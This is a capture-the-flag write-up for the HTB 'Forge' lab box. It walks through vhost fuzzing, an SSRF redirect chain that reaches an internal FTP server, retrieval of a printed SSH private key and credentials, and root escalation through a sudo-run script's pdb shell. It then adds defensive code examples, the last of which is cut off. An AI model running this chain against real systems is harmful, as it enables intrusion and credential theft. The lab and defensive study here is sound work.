Forge-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: web functionality analysis, VHOST enumeration, SSRF, crafting a 301 redirect response, building a POST request with curl, Python code construction

Reference: https://0xdf.gitlab.io/2022/01/22/htb-forge.html

Reference: https://khaoticdev.net/hack-the-box-forge/

0x01 Obtaining user access

1. Target IP address: 10.10.11.111

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop/tools/htb-portscan]
└─$ sudo ./htb-portscan.sh 10.10.11.111 tcp
[sudo] kali 的密码:
开始对 10.10.11.111 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.11.111" -oG "10.10.11.111"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-24 16:45 CST
Nmap scan report for 10.10.11.111
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 11.48 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -O -p"22,80," "10.10.11.111"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-24 16:45 CST
Nmap scan report for 10.10.11.111
Host is up (0.33s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
| 256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_ 256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://forge.htb
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (93%), Linux 4.15 - 5.8 (93%), Linux 5.3 - 5.4 (92%), Linux 2.6.32 (92%), Linux 5.0 - 5.5 (92%), Linux 3.1 (91%), Linux 3.2 (91%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (90%), Linux 5.0 - 5.4 (89%), Linux 5.4 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.09 seconds

3. Based on the scan output, add the hostname to the local hosts file

┌──(kali㉿offsec)-[~/Desktop/tools/htb-portscan]
└─$ echo "10.10.11.111 forge.htb" | sudo tee -a /etc/hosts
10.10.11.111 forge.htb

4. Enumerate directories with dirsearch and ffuf

┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://forge.htb/

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_forge.htb/__24-01-24_17-38-25.txt

Target: http://forge.htb/

[17:38:25] Starting:
[17:40:45] 403 - 274B - /server-status
[17:40:46] 403 - 274B - /server-status/
[17:40:53] 301 - 307B - /static -> http://forge.htb/static/
[17:40:53] 404 - 271B - /static/api/swagger.yaml
[17:40:53] 404 - 271B - /static/api/swagger.json
[17:40:53] 404 - 271B - /static/dump.sql
[17:41:02] 200 - 929B - /upload
[17:41:02] 301 - 224B - /uploads -> http://forge.htb/uploads/


┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://forge.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://forge.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

uploads [Status: 301, Size: 224, Words: 21, Lines: 4, Duration: 324ms]
static [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 333ms]
upload [Status: 200, Size: 929, Words: 267, Lines: 33, Duration: 315ms]

:: Progress: [81643/81643] :: Job [1/1] :: 31 req/sec :: Duration: [0:12:38] :: Errors: 0 ::

5. I also ran a subdomain scan here and found nothing useful. Because this is a virtual lab host, DNS-based brute forcing does not work; vhost enumeration (fuzzing the Host header) is needed instead to check whether other subdomains exist

┌──(kali㉿offsec)-[~/Desktop]
└─$ wfuzz -u http://10.10.11.111 -H "Host: FUZZ.forge.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw 26
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://10.10.11.111/
Total requests: 19966

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000024: 200 1 L 4 W 27 Ch "admin"

6. This reveals one subdomain. Add it to the local hosts file and take a look at the page

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.111 admin.forge.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.111 admin.forge.htb

7. Next, look at what the website on port 80 offers

http://forge.htb/

8. Port 80 hosts a website that is just an image gallery. Moving on to the upload directory: this page is a file upload page. It fetches the file, generates a link, and the content behind that link is the content of the fetched file

http://forge.htb/upload

9. Testing shows this page supports two upload methods: a local file upload and a remote (URL) upload. Entering an unreachable network address produces an error message

An error occured! Error : HTTPConnectionPool(host='10.10.14.6', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f2ff7c4cf40>: Failed to establish a new connection: [Errno 111] Connection refused'))

10. Start an nc listener on port 443 and inspect what the target sends to it

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 39270
GET / HTTP/1.1
Host: 10.10.14.6:443
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

11. From this we learn that the requests are made by a Python service (python-requests), and that an SSRF vulnerability exists here: the server can be made to request arbitrary addresses. Given the admin.forge.htb vhost found earlier, we can run an HTTP service locally and, when the target fetches it, redirect the target to the admin subdomain; the stored result then tells us what that subdomain serves

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'HTTP/1.1 301 Moved Permanently' > response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'Date: Fri, 26 Jan 2024 06:56:12 GMT' >> response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'Server: Apache/2.4.41 (Ubuntu)' >> response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'Location: http://admin.forge.htb/' >> response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat response-301
HTTP/1.1 301 Moved Permanently
Date: Fri, 26 Jan 2024 06:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://admin.forge.htb/

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 < response-301
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 52036
GET / HTTP/1.1
Host: 10.10.14.6
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

^C

12. Then use curl to make the target fetch our listening port

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -X POST -d 'url=http%3A%2F%2F10.10.14.6&remote=1' http://forge.htb/upload
<!DOCTYPE html>
<html>
<head>
<title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css" href="/static/css/upload.css">
<script type="text/javascript" src="/static/js/main.js"></script>
<header>
<nav>
<h1 class=""><a href="/">Gallery</a></h1>
<h1 class="align-right"><a href="/upload">Upload an image</a></h1>
</nav>
</header>
<center>
<br><br>
<div id="content">
<h2 onclick="show_upload_local_file()">
Upload local file
</h2>
<h2 onclick="show_upload_remote_file()">
Upload from url
</h2>
<div id="form-div">

</div>
</div>
</center>
<br>
<br>
<h1>
<center>
<strong>File uploaded successfully to the following url:</strong>
</center>
</h1>
<h1>
<center>
<strong><a href="http://forge.htb/uploads/DQuTt1inycz1YMpIzYpr">http://forge.htb/uploads/DQuTt1inycz1YMpIzYpr</strong>
</center>
</h1>
</body>
</html>

13. Request that address and see what it contains

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/DQuTt1inycz1YMpIzYpr
<!DOCTYPE html>
<html>
<head>
<title>Admin Portal</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a></h1>
</nav>
</header>
<br><br><br><br>
<br><br><br><br>
<center><h1>Welcome Admins!</h1></center>
</body>
</html>

14. From this response we learn that admin.forge.htb has an /announcements path. Modify the redirect target and fetch again

┌──(kali㉿offsec)-[~/Desktop]
└─$ vim response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat response-301
HTTP/1.1 301 Moved Permanently
Date: Fri, 26 Jan 2024 06:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://admin.forge.htb/announcements

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 < response-301
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 52074
GET / HTTP/1.1
Host: 10.10.14.6
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

^C

15. Send the upload request again and view the result

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -X POST -d 'url=http%3A%2F%2F10.10.14.6&remote=1' http://forge.htb/upload
<!DOCTYPE html>
<html>
<head>
<title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css" href="/static/css/upload.css">
<script type="text/javascript" src="/static/js/main.js"></script>
<header>
<nav>
<h1 class=""><a href="/">Gallery</a></h1>
<h1 class="align-right"><a href="/upload">Upload an image</a></h1>
</nav>
</header>
<center>
<br><br>
<div id="content">
<h2 onclick="show_upload_local_file()">
Upload local file
</h2>
<h2 onclick="show_upload_remote_file()">
Upload from url
</h2>
<div id="form-div">

</div>
</div>
</center>
<br>
<br>
<h1>
<center>
<strong>File uploaded successfully to the following url:</strong>
</center>
</h1>
<h1>
<center>
<strong><a href="http://forge.htb/uploads/D4L2zhsiUKRdtOLW392o">http://forge.htb/uploads/D4L2zhsiUKRdtOLW392o</strong>
</center>
</h1>
</body>
</html>

16. Request the generated address

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/D4L2zhsiUKRdtOLW392o
<!DOCTYPE html>
<html>
<head>
<title>Announcements</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a></h1>
</nav>
</header>
<br><br><br>
<ul>
<li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
<li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
<li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
</ul>
</body>
</html>

17. Here we find FTP credentials

user:heightofsecurity123!

18. Following the hint, point the redirect at the FTP address and see what it contains

┌──(kali㉿offsec)-[~/Desktop]
└─$ vim response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat response-301
HTTP/1.1 301 Moved Permanently
Date: Fri, 26 Jan 2024 06:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 < response-301
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 52150
GET / HTTP/1.1
Host: 10.10.14.6
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

^C

19. Send the request

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -X POST -d 'url=http%3A%2F%2F10.10.14.6&remote=1' http://forge.htb/upload
<!DOCTYPE html>
<html>
<head>
<title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css" href="/static/css/upload.css">
<script type="text/javascript" src="/static/js/main.js"></script>
<header>
<nav>
<h1 class=""><a href="/">Gallery</a></h1>
<h1 class="align-right"><a href="/upload">Upload an image</a></h1>
</nav>
</header>
<center>
<br><br>
<div id="content">
<h2 onclick="show_upload_local_file()">
Upload local file
</h2>
<h2 onclick="show_upload_remote_file()">
Upload from url
</h2>
<div id="form-div">

</div>
</div>
</center>
<br>
<br>
<h1>
<center>
<strong>File uploaded successfully to the following url:</strong>
</center>
</h1>
<h1>
<center>
<strong><a href="http://forge.htb/uploads/mLyuNrvfVuk1JannEoWN">http://forge.htb/uploads/mLyuNrvfVuk1JannEoWN</strong>
</center>
</h1>
</body>
</html>

20. Check the result

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/mLyuNrvfVuk1JannEoWN
drwxr-xr-x 3 1000 1000 4096 Aug 04 2021 snap
-rw-r----- 1 0 1000 33 Jan 26 06:47 user.txt

21. Judging from this listing, this is probably a user's home directory. Can we read the .ssh key directly?

┌──(kali㉿offsec)-[~/Desktop]
└─$ vim response-301

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat response-301
HTTP/1.1 301 Moved Permanently
Date: Fri, 26 Jan 2024 06:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/id_rsa

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 < response-301
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.111] 52232
GET / HTTP/1.1
Host: 10.10.14.6
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

^C

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -X POST -d 'url=http%3A%2F%2F10.10.14.6&remote=1' http://forge.htb/upload
<!DOCTYPE html>
<html>
<head>
<title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css" href="/static/css/upload.css">
<script type="text/javascript" src="/static/js/main.js"></script>
<header>
<nav>
<h1 class=""><a href="/">Gallery</a></h1>
<h1 class="align-right"><a href="/upload">Upload an image</a></h1>
</nav>
</header>
<center>
<br><br>
<div id="content">
<h2 onclick="show_upload_local_file()">
Upload local file
</h2>
<h2 onclick="show_upload_remote_file()">
Upload from url
</h2>
<div id="form-div">

</div>
</div>
</center>
<br>
<br>
<h1>
<center>
<strong>File uploaded successfully to the following url:</strong>
</center>
</h1>
<h1>
<center>
<strong><a href="http://forge.htb/uploads/R0byGNI2PdFhYlX6AjTD">http://forge.htb/uploads/R0byGNI2PdFhYlX6AjTD</strong>
</center>
</h1>
</body>
</html>

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/R0byGNI2PdFhYlX6AjTD
-----BEGIN OPENSSH PRIVATE KEY-----
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
shlLupso7WoS0AAAAKdXNlckBmb3JnZQE=
-----END OPENSSH PRIVATE KEY-----

22. The private key was retrieved successfully. Download the file and create a local key

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://forge.htb/uploads/R0byGNI2PdFhYlX6AjTD -o id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2590 100 2590 0 0 2044 0 0:00:01 0:00:01 --:--:-- 2047

23. Set the file permissions

┌──(kali㉿offsec)-[~/Desktop]
└─$ chmod 600 id_rsa

24. Log in to the target via SSH

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh -i id_rsa user@10.10.11.111
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Fri 26 Jan 2024 07:21:15 AM UTC

System load: 0.0
Usage of /: 43.8% of 6.82GB
Memory usage: 21%
Swap usage: 0%
Processes: 222
Users logged in: 0
IPv4 address for eth0: 10.10.11.111
IPv6 address for eth0: dead:beef::250:56ff:feb9:2bd1


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Aug 20 01:32:18 2021 from 10.10.14.6
user@forge:~$

25. Read the first flag

user@forge:~$ id
uid=1000(user) gid=1000(user) groups=1000(user)
user@forge:~$ ls
snap user.txt
user@forge:~$ cat user.txt
758819b7fe569e0c14f21ee150651668
user@forge:~$

Note: a summary of the exploitation chain above

I submit http://10.10.14.6/3?f=.ssh/ as the URL to /upload on forge.htb.

The filter checks and approves the URL.

forge.htb requests /3?f=.ssh/ from Flask.

Flask returns a 302 redirect to http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/ . This sends forge.htb to /upload on admin.forge.htb, which can handle FTP; the GET parameter makes it connect to the local FTP server.

admin.forge.htb requests the /.ssh/ directory listing from FTP.

FTP returns the result, and admin.forge.htb passes it back to forge.htb.

forge.htb saves the result under a random name in the /uploads directory.

The URL of that saved file is returned to me.
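The chain summarised above works because the upload handler validates only the URL the user submitted and then lets its HTTP client follow the 301/302 to admin.forge.htb and on to an ftp:// target. The fix on the defending side is to re-run the checks on every Location header before the next request is made and to refuse schemes other than http(s). The following is an added example of such a fetcher, not code from the box or from the writeup author; the DNS table, the HTTP responses and the SELF_ADDRESSES set are constructed so it runs offline.

```python
"""SSRF-hardened remote fetch: validate every hop of a redirect chain.

Added example (not the Forge application's code). fetch_safely() follows
redirects by hand, so each Location target goes through validate_url()
before it is requested. The fixtures at the bottom are constructed.
"""
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Assumption (constructed): addresses the fetching server itself owns.
SELF_ADDRESSES = {"10.10.11.111", "127.0.0.1"}
MAX_HOPS = 3


def resolve_all(host):
    """Real resolver: every address for host (used when no fake is injected)."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def validate_url(url, resolve=resolve_all):
    """Return (ok, reason). Rejects non-http(s) schemes, URLs carrying
    credentials, unresolvable hosts, and hosts that resolve to a non-public
    address or to one of the server's own addresses."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    if not parts.hostname:
        return False, "missing host"
    addrs = resolve(parts.hostname)
    if not addrs:
        return False, f"{parts.hostname} does not resolve"
    for addr in addrs:
        if addr in SELF_ADDRESSES or not ipaddress.ip_address(addr).is_global:
            return False, f"{parts.hostname} resolves to internal address {addr}"
    return True, "ok"


def fetch_safely(url, fetch, resolve=resolve_all, max_hops=MAX_HOPS):
    """Follow redirects manually, validating each hop.

    fetch(url) must perform ONE request with redirects disabled (for the
    requests library that is requests.get(url, allow_redirects=False)) and
    return (status, headers, body). Returns (True, body) or (False, reason).
    """
    for hop in range(max_hops + 1):
        ok, reason = validate_url(url, resolve)
        if not ok:
            return False, f"hop {hop}: {url} rejected: {reason}"
        status, headers, body = fetch(url)
        location = headers.get("Location")
        if status in (301, 302, 303, 307, 308) and location:
            url = urljoin(url, location)  # relative Location values resolve too
            continue
        return True, body
    return False, f"more than {max_hops} redirects"


# --- constructed fixtures mirroring the redirect trick used on this box ---
FAKE_DNS = {
    "images.example": ["93.184.216.34"],  # a public host (constructed)
    "admin.forge.htb": ["10.10.11.111"],  # the box's internal vhost
}
FAKE_RESPONSES = {
    "http://images.example/": (301, {"Location": "http://admin.forge.htb/announcements"}, b""),
    "http://images.example/cat.png": (200, {}, b"\x89PNG..."),
    "http://admin.forge.htb/announcements": (200, {}, b"<h1>Welcome Admins!</h1>"),
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def fake_fetch(url):
    return FAKE_RESPONSES.get(url, (404, {}, b"not found"))


if __name__ == "__main__":
    print(fetch_safely("http://images.example/cat.png", fake_fetch, fake_resolve))
    print(fetch_safely("http://images.example/", fake_fetch, fake_resolve))
    print(validate_url("ftp://user:pw@127.0.0.1/.ssh/id_rsa", fake_resolve))
```

Resolving the hostname and checking the address, rather than matching strings such as "forge.htb" or "127.0.0.1" in the URL, is what stops the redirect: the second hop is rejected because admin.forge.htb resolves to an address the server owns, and the ftp:// form is rejected on scheme before any connection is attempted.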

0x02 Obtaining root access

26. Check sudo privileges

user@forge:~$ sudo -l
Matching Defaults entries for user on forge:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on forge:
(ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py
user@forge:~$

27. The allowed command runs a Python script, so let's look at that script

user@forge:~$ 
user@forge:~$ ls -la /opt/remote-manage.py
-rwxr-xr-x 1 root root 1447 May 31 2021 /opt/remote-manage.py
user@forge:~$ cat /opt/remote-manage.py
#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()
user@forge:~$

28. The script listens on a random local port. With the correct password you get the service menu, but any exception (for example a non-numeric menu choice, which makes int() raise) lands in the except branch and drops into a Python pdb shell, which runs as root through the sudo rule. From there the final flag can be read

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py
Listening on localhost:55021
invalid literal for int() with base 10: b'shiyan'
> /opt/remote-manage.py(27)<module>()
-> option = int(clientsock.recv(1024).strip())
(Pdb) import os
(Pdb) os.system('bash')
root@forge:/home/user#
root@forge:/home/user# cd /root/
root@forge:~# ls
clean-uploads.sh root.txt snap
root@forge:~# cat root.txt
afe109870ab64a4c1fd94f6a45f5f2b5
root@forge:~#
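Two things turn this sudo rule into a root shell: the menu choice is passed straight to int(), and the except branch hands the resulting exception to pdb.post_mortem, an interactive debugger inherited by whoever connected. The following is an added hardened rewrite of the script's menu loop, not the code from the box: input is parsed defensively, pdb is never imported, failures are logged instead of debugged, and the handler is a pure function so it can be tested without a socket. The secret file path /etc/remote-manage.secret and the FakeCompleted/fake_runner fixtures are assumptions constructed for this example.

```python
"""Hardened rewrite of the /opt/remote-manage.py menu loop (added example).

Differences from the original: no pdb, no hardcoded password, constant-time
password compare, fixed argv commands run without a shell, and a bad menu
choice produces "Invalid option" instead of an exception.
"""
import hmac
import logging
import random
import socket
import subprocess

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("remote-manage")

MENU = (b"\nWhat do you wanna do: \n"
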